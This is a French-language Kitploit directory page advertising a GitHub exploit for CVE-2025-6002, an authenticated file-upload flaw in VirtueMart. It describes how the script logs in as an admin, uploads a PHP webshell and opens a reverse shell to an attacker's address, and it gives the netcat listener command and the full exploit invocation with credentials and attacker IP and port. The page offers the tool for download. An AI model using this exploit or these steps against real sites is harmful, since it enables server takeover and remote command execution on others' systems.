Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6002 | Kitploit
Outils/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2025-6002

Ce script exploite la vulnérabilité de téléversement arbitraire de fichiers authentifié dans VirtueMart < 4.4.10 (CVE-2025-6002), décrite dans cet article de blog : https://blog.blacklanternsecurity.com/p/doomla-zero-days

Ce script se connecte à VirtueMart avec les identifiants fournis, crée un nouveau produit et téléverse un webshell PHP en tant que fichier média. Il invoque ensuite un reverse shell vers l'IP/le port fournis.

Paramètres :

  • --url: l'URL de VirtueMart
  • --username: nom d'utilisateur admin
  • --password: mot de passe admin
  • --remote-ip: adresse IP de l'attaquanthttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: port de l'attaquant

Utilisation :

  1. Exécutez Netcat sur la machine de l'attaquant :
root@kitploit:~
nc -nlvp 1337
  1. Exécutez l'exploit
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Télécharger l’outil